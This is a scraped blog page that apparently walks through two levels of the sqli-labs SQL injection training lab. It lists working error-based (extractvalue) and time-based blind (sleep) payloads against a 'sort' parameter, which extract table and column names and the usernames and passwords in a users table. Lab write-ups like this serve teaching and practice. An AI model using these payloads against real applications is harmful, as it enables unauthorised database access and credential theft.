当前位置:网站首页>SQL injection Less47 (error injection) and Less49 (time blind injection)
SQL injection Less47 (error injection) and Less49 (time blind injection)
2022-07-31 22:51:00 【HUAWEI CLOUD】
Less47 and Less49 can't use rand() Boolean blind annotation
Because there are single quotes to closeorder by 'rand()' This statement obviously cannot be executedp>
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- @JsonFormat(pattern=“yyyy-MM-dd“)时间差问题
- A shortcut to search for specific character content in idea
- The difference between adding or not adding the ref keyword when a variable of reference type is used as a parameter in a method call in C#
- @JsonFormat(pattern="yyyy-MM-dd") time difference problem
- The uniapp applet checks and prompts for updates
- Istio introduction
- 无状态与有状态的区别
- 一款国外开发的高质量WordPress下载站模板主题
- Verilog implements a divide-by-9 with a duty cycle of 5/18
- grep command written test questions
猜你喜欢
How to identify fake reptiles?
ICML2022 | 深入研究置换敏感的图神经网络
20. Support vector machine - knowledge of mathematical principles
In Golang go-redis cluster mode, new connections are constantly created, and the problem of decreased efficiency is solved
数据分析(一)——matplotlib
登录业务实现(单点登录+微信扫码+短信服务)
Payment module implementation
日常--Kali开启SSH(详细教程)
Recognize anomalies (you will understand after reading this)
The difference between adding or not adding the ref keyword when a variable of reference type is used as a parameter in a method call in C#
随机推荐
Realize serial port receiving data based on STM32 ring queue
Binary tree non-recursive traversal
SQL27 View user details of different age groups
信息学奥赛一本通 1941:【07NOIP普及组】Hanoi双塔问题 | 洛谷 P1096 [NOIP2007 普及组] Hanoi 双塔问题
[Open class preview]: Research and application of super-resolution technology in the field of video image quality enhancement
不知道该怎么办的同步问题
One thing to say, is outsourcing company worth it?
Memblaze released the first enterprise-grade SSD based on long-lasting particles. What is the new value behind it?
Write a database document management tool based on WPF repeating the wheel (1)
Pytorch lstm time series prediction problem stepping on the pit "recommended collection"
Unity-通过预制件和克隆方法动态实现各个UGUI下控件的创建和显示
HTC using official firmware as bottom bag made ROM brush card bag tutorial
IDA PRO中汇编结构体识别
iNeuOS industrial Internet operating system, equipment operation and maintenance business and "low-code" form development tools
Structure of the actual combat battalion module eight operations
A high-quality WordPress download site template theme developed abroad
景区手绘地图的绘制流程
In Golang go-redis cluster mode, new connections are constantly created, and the problem of decreased efficiency is solved
什么是客户画像管理?
grep command written test questions